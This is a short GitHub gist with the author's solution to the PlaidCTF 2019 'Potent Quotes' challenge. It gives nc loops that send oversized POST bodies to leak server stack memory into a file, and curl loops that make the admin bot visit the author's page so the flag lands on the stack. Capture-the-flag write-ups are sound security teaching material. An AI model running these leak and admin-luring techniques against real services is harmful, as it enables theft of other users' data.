Skip to content

Instantly share code, notes, and snippets.

@terjanq
Last active April 15, 2019 10:54
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save terjanq/7ab6a7199f53de25e71a7b80147f54f0 to your computer and use it in GitHub Desktop.
Save terjanq/7ab6a7199f53de25e71a7b80147f54f0 to your computer and use it in GitHub Desktop.
Solution for Potent Quotes #pctf2019
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it
#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done
#In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
for i in {0..20}; do curl http://quotables.pwni.ng:1337/report -d 'path=http://terjanq.cf/admin.html'; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment